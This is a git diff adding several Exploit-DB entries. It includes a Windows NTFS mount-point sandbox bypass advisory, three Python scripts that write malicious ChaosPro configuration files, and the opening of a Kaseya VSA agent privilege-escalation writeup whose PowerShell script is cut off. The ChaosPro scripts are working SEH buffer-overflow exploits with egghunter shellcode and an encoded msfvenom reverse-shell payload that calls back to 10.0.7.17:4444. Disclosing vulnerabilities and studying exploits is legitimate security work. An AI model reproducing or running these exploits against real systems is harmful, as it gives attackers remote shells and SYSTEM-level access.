+++ b/exploits/windows/local/47306.txt
@@ -0,0 +1,33 @@
+Windows: SET_REPARSE_POINT_EX Mount Point Security Feature Bypass
+Platform: Windows 10 1903, 1809 (not tested earlier)
+Class: Security Feature Bypass
+
+Summary: 
+
+The NTFS driver supports a new FS control code to set a mount point which the existing sandbox mitigation doesn’t support allowing a sandboxed application to set an arbitrary mount point symbolic link.
+
+Description:
+
+After multiple previous attempts the kernel mitigation against adding arbitrary NTFS mount points seems pretty robust. However due to the way it was implemented inside the IO manager in the kernel it is fragile to changes inside the filesystem drivers as the mitigation is only implemented when the FSCTL_SET_REPASE_POINT control code is used.
+
+In this case at some point (based on headers probably RS1) a new FSCTL was added to NTFS, FSCTL_SET_REPARSE_POINT_EX to allow overwriting an existing reparse point without having to first delete it. This FSCTL has a different control code to the old one, therefore issuing it does not trigger the mitigation and an arbitrary mount point can be set from any sandboxed applications. This mount point could then facilitate further attacks, for example https://bugs.chromium.org/p/project-zero/issues/detail?id=1413 is probably now vulnerable again to drop an arbitrary file as the current user.
+
+Fixing wise obviously you’d want to also detect this FSCTL and handle it in the mitigation. You’ll probably want to verify the NTFS implementation to check that it’s not possible to just change the data without specifying a valid tag when an existing tag is already set as the single optional flag you can specify isn’t exactly clear on this. You might also want to find a way of getting visibility on new changes which can affect symbolic link operations, as this is 3rd time this has happened recently (previously NPFS symlinks and global symlinks) that I know of.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It will create a temporary directory, drop its token’s IL to Low then set that directory to be a mount point to the windows folder which would not normally be allowed.
+
+1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
+2) As a normal user run the PoC. 
+3) The PoC should print the set mount point path.
+
+Expected Result:
+Setting the mount point should fail with access denied.
+
+Observed Result:
+The mount point is set to an arbitrary directory.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47306.zip
\ No newline at end of file
diff --git a/exploits/windows/local/47332.py b/exploits/windows/local/47332.py
new file mode 100755
index 000000000..58db93fd0
--- /dev/null
+++ b/exploits/windows/local/47332.py
@@ -0,0 +1,98 @@
+#!C:\Python27\python.exe
+
+# Title     : ChaosPro 2.0
+# Twitter   : @securitychops
+# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
+
+#this needs to be a backwards jump to give us room to call stack jump code
+jmpback80         = "\x40\x75\x80\x75"
+jmpforward06      = "\x40\x75\x06\x75"
+
+# our egghunter shellcode
+egghunter = ( 
+"\x66\x81\xca\xff\x0f\x42\x52\x31\xdb\x43"
+"\x43\x53\x58\xcd\x2e\x3c\x05\x5a\x74\xec"
+"\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xe7"
+"\xaf\x75\xe4\xff\xe7"
+)
+
+# our egg!
+payload = "T00WT00W"
+
+#the payload
+payload += (
+# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17 
+# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
+"\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
+"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
+"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
+"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
+"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
+"\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
+"\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
+"\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
+"\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
+"\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
+"\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
+"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
+"\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
+"\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
+"\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
+"\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
+"\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
+"\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
+"\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
+"\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
+"\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
+"\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
+"\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
+"\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
+"\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
+"\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
+"\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
+"\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
+"\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
+"\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
+"\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
+"\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
+"\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
+"\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
+"\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
+"\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
+"\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
+"\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
+"\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
+"\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
+"\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
+"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
+"\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
+"\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
+"\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
+"\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
+"\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
+"\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
+)
+
+#line containing our payload
+line_start = "Username "
+line_start += payload + "\n"
+
+#line with our overflow
+line_start += "ProjectPath "
+junk = line_start
+
+junk += "A" * (2705 - len(jmpforward06) - len(jmpback80) - len(egghunter))
+
+# our egghunter ... 
+junk += egghunter
+
+# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
+junk += jmpforward06
+junk += jmpback80
+
+#seh address for pop, pop and ret with a 0x00 at the end ... 
+junk += "\x50\x49\x40"
+
+# write the evil file
+with open('C:\\Documents and Settings\\Administrator\\My Documents\\Downloads\\cpro20\\ChaosPro.cfg', 'w') as the_file:
+    the_file.write(junk)
\ No newline at end of file
diff --git a/exploits/windows/local/47333.py b/exploits/windows/local/47333.py
new file mode 100755
index 000000000..e481f2a34
--- /dev/null
+++ b/exploits/windows/local/47333.py
@@ -0,0 +1,103 @@
+#!C:\Python27\python.exe
+
+# Title     : ChaosPro 2.1
+# Twitter   : @securitychops
+# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
+
+# our egg!
+payload = "T00WT00W"
+
+#the payload
+payload += (
+# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17 
+# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
+"\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
+"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
+"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
+"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
+"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
+"\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
+"\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
+"\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
+"\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
+"\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
+"\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
+"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
+"\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
+"\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
+"\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
+"\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
+"\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
+"\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
+"\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
+"\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
+"\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
+"\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
+"\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
+"\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
+"\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
+"\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
+"\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
+"\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
+"\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
+"\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
+"\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
+"\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
+"\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
+"\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
+"\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
+"\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
+"\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
+"\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
+"\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
+"\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
+"\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
+"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
+"\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
+"\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
+"\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
+"\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
+"\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
+"\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
+)
+
+#this needs to be a backwards jump to give us room to call stack jump code
+jmpbackD0         = "\x40\x75\xD0\x75"
+jmpforward06      = "\x40\x75\x06\x75"
+
+# 16 byte shellcode from: https://www.exploit-db.com/exploits/43773/
+opencalc          = "\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
+
+# our egghunter shellcode
+egghunter = ( 
+"\x66\x81\xca\xff\x0f\x42\x52\x31\xdb\x43"
+"\x43\x53\x58\xcd\x2e\x3c\x05\x5a\x74\xec"
+"\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xe7"
+"\xaf\x75\xe4\xff\xe7"
+)
+
+#line containing our payload
+line_start = "Username "
+line_start += payload + "\n"
+
+#line with our overflow
+line_start += "ProjectPath "
+junk = line_start
+
+junk += "A" * (2569 - 118 - len(jmpforward06) - len(jmpbackD0))
+
+junk += "A" * (118 - len(egghunter))
+
+# open calc
+junk += egghunter
+
+# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
+junk += jmpforward06
+junk += jmpbackD0
+
+#seh address for pop, pop and ret with a 0x00 at the end ... 
+junk += "\xab\x11\x40"
+
+# write the evil file
+with open('C:\\Program Files\\ChaosPro2.1\\ChaosPro.cfg', 'w') as the_file:
+    the_file.write(junk)
\ No newline at end of file
diff --git a/exploits/windows/local/47334.py b/exploits/windows/local/47334.py
new file mode 100755
index 000000000..1d2c27b1a
--- /dev/null
+++ b/exploits/windows/local/47334.py
@@ -0,0 +1,305 @@
+#!C:\Python27\python.exe
+
+# Title     : ChaosPro 3.1
+# Twitter   : @securitychops
+# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
+
+# our egg!
+payload = "T00WT00W"
+
+# adjust the stack from 00F2FFA6 to 00F2FFA8
+payload += "\x83\xC4\x02"
+
+#the payload
+payload += (
+# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17 
+# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
+"\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
+"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
+"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
+"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
+"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
+"\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
+"\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
+"\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
+"\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
+"\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
+"\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
+"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
+"\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
+"\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
+"\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
+"\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
+"\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
+"\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
+"\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
+"\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
+"\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
+"\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
+"\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
+"\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
+"\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
+"\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
+"\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
+"\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
+"\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
+"\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
+"\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
+"\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
+"\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
+"\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
+"\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
+"\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
+"\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
+"\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
+"\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
+"\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
+"\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
+"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
+"\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
+"\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
+"\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
+"\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
+"\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
+"\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
+)
+
+#badchars
+#\x0a\x1a\x3b\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a
+#\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9
+#\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8
+#\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7
+#\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6
+#\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5
+#\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4
+#\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
+
+# stack alignment
+pop_esp     = "\x5c"
+pop_eax     = "\x58"
+push_eax    = "\x50"
+push_esp    = "\x54"
+align_stack = "\x2d\x8f\x8e\x8d\x8c\x2d\x7e\x68\x71\x72\x2d\x01\x01\x01\x01"
+zero_eax    = "\x25\x7e\x7e\x05\x7e\x25\x01\x01\x7a\x01"
+
+#this needs to be a backwards jump to give us room to call stack jump code
+jmpback80         = "\x40\x75\x80\x75"
+jmpforward06      = "\x40\x75\x06\x75"
+
+#line containing our payload
+line_start = "Username "
+line_start += payload + "\n"
+
+#line with our overflow
+line_start += "ProjectPath "
+junk = line_start
+
+#the buffer starts being overwritten with
+# our controlled values at 522
+junk += "A" * 522
+
+#junk += alpha_numeric_hex
+junk += "A" * (1060 - 522 - 126 - 126 - 126 - len(jmpback80) - len(jmpforward06) - len(jmpforward06))
+#- 41 - 4 - 41 - 4 - 41 - 4 - 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4)
+
+# baby nopsled
+junk += "A" * 9
+
+# ok, lets start working stuff here ... we have 126 bytesish ... 
+junk += zero_eax
+junk += push_esp + pop_eax  # push esp, pop eax
+junk += align_stack
+junk += push_eax
+junk += pop_esp
+
+# first section into the stack
+# e7 ff e4 75
+# good 
+junk += zero_eax 
+junk += "\x2d\x89\x88\x87\x86"
+junk += "\x2d\x01\x8f\x77\x8f"
+junk += "\x2d\x01\x04\x01\x02"
+junk += push_eax
+
+# second section into the stack
+# af e7 75 af
+# good
+junk += zero_eax 
+junk += "\x2d\x4f\x4e\x4d\x4c"
+junk += "\x2d\x01\x39\x8f\x02"
+junk += "\x2d\x01\x03\x3c\x01"
+junk += push_eax
+
+# third section into the stack
+# d7 89 57 30
+# good
+junk += zero_eax 
+junk += "\x2d\x8f\x8e\x74\x73"
+junk += "\x2d\x3e\x19\x01\x8f"
+junk += "\x2d\x03\x01\x01\x26"
+junk += push_eax
+
+# size for section one
+junk += "A" * (
+	126
+	- 9 # nopsled
+	
+	# aligning the stack
+	- len(zero_eax) 
+	- len(push_esp) 
+	- len(pop_eax) 
+	- len(align_stack) 
+	- len(push_eax) 
+	- len(pop_esp) 
+	
+	  # first set of bytes going onto the stack
+	- len(zero_eax)
+	- 15 
+	- len(push_eax)
+	
+	  # second set of bytes going onto the stack
+	- len(zero_eax)
+	- 15
+	- len(push_eax)
+	
+	  # third set of bytes going onto the stack
+	- len(zero_eax)
+	- 15
+	- len(push_eax)			
+)
+
+# baby nopslep just for breathing room
+junk += "AAAA"
+# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
+junk += jmpforward06
+junk += jmpback80
+
+#Section Two
+
+# baby nopsled
+junk += "AAA" 
+
+# fourth section into the stack part two
+# 30 54 b8 ec
+# fourth section into the stack part one
+junk += zero_eax 
+junk += "\x2d\x80\x15\x75\x75"
+junk += "\x2d\x80\x20\x32\x35"
+junk += "\x2d\x14\x11\x04\x25"
+junk += push_eax
+
+# fifth section into the stack
+# 74 5a 05 3c
+# good
+junk += zero_eax 
+junk += "\x2d\x8f\x8e\x8d\x89"
+junk += "\x2d\x34\x6b\x17\x01"
+junk += "\x2d\x01\x01\x01\x01"
+junk += push_eax
+
+# sixth section into the stack
+# 2e cd 58 53
+# good 
+junk += zero_eax 
+junk += "\x2d\x8f\x8e\x8d\x8c"
+junk += "\x2d\x1d\x18\x8e\x43"
+junk += "\x2d\x01\x01\x17\x01"
+junk += push_eax
+
+# seventh section into the stack
+# 43 43 db 31
+# good
+junk += zero_eax 
+junk += "\x2d\x8f\x8e\x8d\x8c"
+junk += "\x2d\x3e\x7f\x2d\x2d"
+junk += "\x2d\x02\x17\x01\x03"
+junk += push_eax
+
+junk += "A" * (
+	126 # amount of room before we need to jump
+	
+	- 3 # baby nopsled
+	
+	 # part one of fourth set of bytes going onto the stack
+	- len(zero_eax)		
+	
+	# part two of fourth sec of bytes going onto the stack
+	- 15
+	- len(push_eax)
+	
+	  # fifth set of bytes going onto the stack
+	- len(zero_eax)
+	- 15
+	- len(push_eax)
+	
+	  # sixth set of bytes going onto the stack
+	- len(zero_eax)
+	- 15
+	- len(push_eax)
+
+	  # seventh set of bytes going onto the stack
+	- len(zero_eax)
+	- 15
+	- len(push_eax)	
+	
+	- 4 # baby nopsled		
+	- len(jmpback80)
+)
+
+# Second Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
+junk += jmpforward06
+junk += jmpback80
+
+# baby nopsled
+junk += "AAAA"
+
+# eighth section into the stack part two
+# 52 42 0f ff
+# good
+# eighth section into the stack part one
+junk += zero_eax 
+junk += "\x2d\x65\x65\x75\x75"
+junk += "\x2d\x65\x65\x25\x25"
+junk += "\x2d\x37\x25\x23\x13"
+junk += push_eax
+
+# ninth section into the stack
+# ca 81 66 43
+# good
+junk += zero_eax 
+junk += "\x2d\x8f\x81\x7c\x7b"
+junk += "\x2d\x2d\x17\x01\x8f"
+junk += "\x2d\x01\x01\x01\x2b"
+junk += push_eax
+
+junk += "A" * (
+	126 # amount of room before we need to jump
+	
+	- len(jmpback80)
+	
+	- 4 # baby nopsled
+
+	# eighth set of bytes going onto the stack
+	# eighth section
+	- len(zero_eax)
+	- 15
+	- len(push_eax)	
+	
+	# ninth set of bytes going onto the stack
+	- len(zero_eax)
+	- 15
+	- len(push_eax)
+	
+	- len(jmpforward06)
+)
+
+# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
+junk += jmpforward06
+junk += jmpback80
+
+#seh address for pop, pop and ret with a 0x00 at the end ... 
+junk += "\x5d\x10\x40"
+
+# write the evil file
+with open('C:\\Program Files\\ChaosPro3.1\\ChaosPro.cfg', 'w') as the_file:
+    the_file.write(junk)
\ No newline at end of file
diff --git a/exploits/windows/local/47341.txt b/exploits/windows/local/47341.txt
new file mode 100644
index 000000000..33301070a
--- /dev/null
+++ b/exploits/windows/local/47341.txt
@@ -0,0 +1,58 @@
+# Exploit Title: Kaseya VSA agent <= 9.5 privilege escalation
+# Google Dork: N/A
+# Date: 2-09-2019
+# Exploit Author: NF
+# Vendor Homepage: https://www.kaseya.com/products/vsa/
+# Software Link: https://www.kaseya.com/products/vsa/
+# Version:  <= 9.5 agentmon.exe
+# Tested on: Windows 10
+# CVE : N/A
+
+
+##Vulnerability##
+
+This is not a new issue as such but more of the same in line with <a href="https://www.securityfocus.com/archive/1/541884/30/300/threaded">CVE-2017-12410</a> found by Filip Palian.
+A a fix was put in place for the original CVE, however it was specific to binaries and not scripts.
+The root cause for both issues is allowing a low privileged group excessive permissions to a folder used by a elevated process.
+
+The Kaseya agent (agentmon.exe) runs as SYSTEM by default.
+The agent also has a default working folder @ C:\kworking\
+It will pull scripts and binaries to this folder and execute them from disk from the controlling web application.
+By default the *Authenticated Users* group has all rights to this folder.
+
+Scripts are written to disk however they are not checked for integrity prior to execution.
+So a folder can be monitored for script files being dropped and then append malicious code prior to execution.
+
+##Proof of concept##
+
+This PowerShell script will monitor the default working directory.
+When a ps1 script drops from a scheduled task or run from the VSA web application it will then append the command "Write-Host 'injected content'" which will run as SYSTEM.
+Change the Write-Host command to the code to be executed or update the script to target other script drops such as vb script.
+
+Note: To test you will need to sign up for a trial with VSA to have the ability to deploy an agent & schedule/run scripts
+
+<--script start-->
+
+      $folder = 'c:\kworking'
+      $filter = '*.ps1'                          
+
